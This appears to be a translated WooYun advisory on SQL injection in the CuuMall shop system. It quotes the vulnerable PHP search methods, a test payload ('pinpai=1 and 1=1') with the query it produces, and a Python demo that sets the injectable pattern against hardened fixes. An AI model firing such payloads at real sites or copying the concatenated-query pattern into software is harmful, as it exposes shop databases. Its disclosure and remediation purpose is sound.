
Vulnerability summary (24 watchers)

Defect ID: wooyun-2014-077934

Title: CuuMall free open-source shop system, multiple SQL injections

Vendor: cuumall.com

Author: menmen519

Submitted: 2014-10-02 10:18

Fix deadline: 2014-12-31 10:20

Published: 2014-12-31 10:20

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-10-02: details sent to the vendor, awaiting vendor handling
2014-10-09: vendor confirmed; details visible to the vendor only
2014-10-12: details opened to third-party security partners
2014-12-03: details opened to core white hats and relevant domain experts
2014-12-13: details opened to regular white hats
2014-12-23: details opened to intern white hats
2014-12-31: details opened to the public

Brief description:

Multiple SQL injections in the CuuMall free open-source shop system

Detailed description:

Straight to the code. SearchAction.class.php, lines 71-109:

public function Exsearch( )
{
    // All four fields come straight from the POST body, unvalidated.
    $pinpai = $_POST['pinpai'];
    $pr1 = $_POST['pr1'];
    $pr2 = $_POST['pr2'];
    $key_word = $_POST['key_word'];
    // Loose comparison: only a value that converts to 0 is blanked out.
    if ( $pinpai == 0 )
    {
        $pinpai = "";
    }
    // Each WHERE fragment is built by string concatenation with no quoting,
    // escaping or type check, so the request body controls SQL syntax.
    if ( $pinpai != "" )
    {
        $sql1 = "pinpai=".$pinpai." and ";
    }
    else
    {
        $sql1 = "";
    }
    if ( $pr1 != "" )
    {
        $sql2 = "memprice>".$pr1." and ";
    }
    else
    {
        $sql2 = "";
    }
    if ( $pr2 != "" )
    {
        $sql3 = "memprice<".$pr2." and ";
    }
    else
    {
        $sql3 = "";
    }
    $title = c( "MALLTITLE" )."-".$key_word;
    $this->assign( "title", $title );
    $header = a( "Header" );
    $header->index( );
    $list = new Model( "produc" );
    import( "ORG.Util.Page" );
    // Sink: the concatenated fragments, plus the unescaped keyword inside
    // the LIKE patterns, become the WHERE clause of a COUNT query.
    $count = $list->where( $sql1.$sql2.$sql3."title like '%".$key_word."%' and body like '%".$key_word."%'" )->count( );
    $page = new Page( $count, 24 );
    // ... (the rest of the method is not reproduced in the report)


Notice that $pinpai, $pr1 and $pr2 are concatenated into the WHERE clause without quotes and without any validation, so the POST body can supply SQL syntax where a number is expected. A test:
URL:
http://192.168.10.70/cuumall_v2.3/v2.3/mall_upload/index.php/home/search/Exsearch
POST data:
pinpai=1 and 1=1&pr1=1&pr2=2
The SQL captured after sending the request:
SELECT COUNT(*) AS tp_count FROM `cuu_produc` WHERE pinpai=1 and 1=1 and memprice>1 and memprice<2 and title like '%%' and body like '%%' LIMIT 1
The `1=1` lands verbatim inside the query. The `$pinpai == 0` check does not stop this: under PHP 5's loose comparison a string with a leading digit compares as that number, so "1 and 1=1" is treated as 1, not 0, and passes through (a payload that did not start with a digit would be blanked, so the injected value has to begin with a number). $key_word is also concatenated unescaped into the two LIKE patterns; it sits between single quotes, so a quote character is needed to break out, but it is the same class of bug.
Next one, same file, lines 135-172:

public function px( )
{
    // Comes straight from the query string, unvalidated.
    $order = $_GET['order'];
    $title = c( "MALLTITLE" );
    $this->assign( "title", $title );
    $header = a( "Header" );
    $header->index( );
    $list = new Model( "produc" );
    import( "ORG.Util.Page" );
    if ( $order == "addtime" )
    {
        $count = $list->count( );
    }
    else
    {
        // Sink: $order is used in column position, so any expression the
        // caller sends is accepted as-is (order=1 alone yields WHERE 1=1).
        $count = $list->where( $order."=1" )->count( );
    }
    $page = new Page( $count, 24 );
    $show = $page->show( );
    if ( $order == "addtime" )
    {
        $pro = $list->order( $order." desc" )->limit( $page->firstRow.",".$page->listRows )->select( );
    }
    else
    {
        // Same unvalidated value reused in the data query.
        $pro = $list->where( $order."=1" )->order( "addtime desc" )->limit( $page->firstRow.",".$page->listRows )->select( );
    }
    $pro = $this->bakimg( $pro );
    $this->assign( "page", $show );
    $this->assign( "pro", $pro );
    $lm = new Model( "lanmu_one" );
    $d_lm = $lm->select( );
    $this->assign( "d_lm", $d_lm );
    $pp = $this->pinpai( );
    $this->assign( "pp", $pp );
    $this->display( "Home:searchlist" );
    $bu = new ButtomAction( );
    $bu->Index( );
    // ... (the rest of the method is not reproduced in the report)


Notice that $order = $_GET['order']; receives no processing at all before it is used in
$count = $list->where( $order."=1" )->count( );
and again in the select() that follows. The principle is the same as above, so it is not demonstrated here. One difference worth keeping in mind for the fix: $order stands in column position rather than value position, so escaping or binding cannot help; the value has to be checked against a fixed list of permitted column names.
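Both injection points, the concatenated WHERE fragments in Exsearch() and the attacker-chosen column name in px(), come down to the same mistake, so here is one added example that rebuilds the query pattern over an in-memory SQLite table. This is illustration code written for this page, not CuuMall or ThinkPHP code: the table, its rows and the `hot` flag column are constructed for the demo, and the whitelist in FLAG_COLUMNS is an assumption. The vulnerable functions reproduce the report's behaviour (the injected condition is evaluated by the database); the hardened ones show what a fix needs, numeric validation plus bound parameters for Exsearch() and a column whitelist for px(), because a column name cannot be passed as a bound parameter.

```python
import re
import sqlite3

# Constructed stand-in for CuuMall's `cuu_produc` table. Column names follow
# the report (pinpai, memprice, title, body); `hot` is an assumed flag column
# that gives px() something to filter on.
SAMPLE_ROWS = [
    (1, 1, 150, "Phone A", "brand one flagship", 1),
    (2, 1, 250, "Phone B", "brand one budget", 0),
    (3, 2, 50, "Cable", "brand two accessory", 1),
]
FLAG_COLUMNS = {"hot"}  # assumed whitelist of columns px() may filter on


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cuu_produc (id INTEGER, pinpai INTEGER, memprice INTEGER,"
        " title TEXT, body TEXT, hot INTEGER)"
    )
    conn.executemany("INSERT INTO cuu_produc VALUES (?,?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def vulnerable_exsearch_count(conn, pinpai="", pr1="", pr2="", key_word=""):
    # Same construction as Exsearch(): every POST field is pasted into the
    # WHERE clause, so the caller controls SQL syntax, not just values.
    sql1 = "pinpai=" + pinpai + " and " if pinpai not in ("", "0") else ""
    sql2 = "memprice>" + pr1 + " and " if pr1 != "" else ""
    sql3 = "memprice<" + pr2 + " and " if pr2 != "" else ""
    where = (sql1 + sql2 + sql3 + "title like '%" + key_word + "%'"
             " and body like '%" + key_word + "%'")
    sql = "SELECT COUNT(*) AS tp_count FROM cuu_produc WHERE " + where + " LIMIT 1"
    return conn.execute(sql).fetchone()[0]


def vulnerable_px_count(conn, order):
    # Same construction as px(): the GET parameter becomes the column name.
    if order == "addtime":
        return conn.execute("SELECT COUNT(*) FROM cuu_produc").fetchone()[0]
    return conn.execute("SELECT COUNT(*) FROM cuu_produc WHERE " + order + "=1").fetchone()[0]


def _numeric(value, name, pattern=r"\d+(\.\d+)?"):
    # Accept only a plain decimal literal; "1 and 1=1" is rejected here,
    # before it gets anywhere near the query text.
    if not re.fullmatch(pattern, value):
        raise ValueError("%s must be numeric, got %r" % (name, value))
    return float(value)


def _escape_like(value):
    # Bound parameters stop injection, but LIKE wildcards in the keyword
    # would still let a user match every row, so escape them as well.
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def safe_exsearch_count(conn, pinpai="", pr1="", pr2="", key_word=""):
    # Hardened form: the SQL text is fixed, values travel as parameters.
    clauses, params = [], []
    if pinpai not in ("", "0"):
        clauses.append("pinpai=?")
        params.append(int(_numeric(pinpai, "pinpai", r"\d+")))
    if pr1 != "":
        clauses.append("memprice>?")
        params.append(_numeric(pr1, "pr1"))
    if pr2 != "":
        clauses.append("memprice<?")
        params.append(_numeric(pr2, "pr2"))
    pattern = "%" + _escape_like(key_word) + "%"
    clauses += ["title like ? escape '\\'", "body like ? escape '\\'"]
    params += [pattern, pattern]
    sql = "SELECT COUNT(*) FROM cuu_produc WHERE " + " and ".join(clauses)
    return conn.execute(sql, params).fetchone()[0]


def safe_px_count(conn, order):
    # A column name cannot be a bound parameter, so px() needs a whitelist:
    # anything that is not a known column is rejected outright.
    if order == "addtime":
        return conn.execute("SELECT COUNT(*) FROM cuu_produc").fetchone()[0]
    if order not in FLAG_COLUMNS:
        raise ValueError("unexpected order column: %r" % order)
    return conn.execute("SELECT COUNT(*) FROM cuu_produc WHERE " + order + "=1").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    # The report's payload: a true and a false injected condition give
    # different counts, which is a boolean oracle on the database.
    print(vulnerable_exsearch_count(db, "1 and 1=1", "1", "999"))
    print(vulnerable_exsearch_count(db, "1 and 1=2", "1", "999"))
    print(vulnerable_px_count(db, "1"))  # order=1 gives WHERE 1=1
    print(safe_exsearch_count(db, "1", "1", "999"))
```

The two vulnerable functions answer the report's payload exactly as the captured query suggests: `1 and 1=1` returns the brand's real row count and `1 and 1=2` returns zero, so an attacker can test arbitrary conditions one bit at a time. The hardened versions reject the same inputs with a ValueError; note that `_escape_like` is needed on top of parameter binding, since a bare `%` as the keyword would otherwise match every product.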

Proof of vulnerability:

Fix recommendation:

Copyright notice: when reproducing, cite the source, menmen519@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 5

Confirmed: 2014-10-09 13:39

Vendor reply:

Thanks

Latest status:

None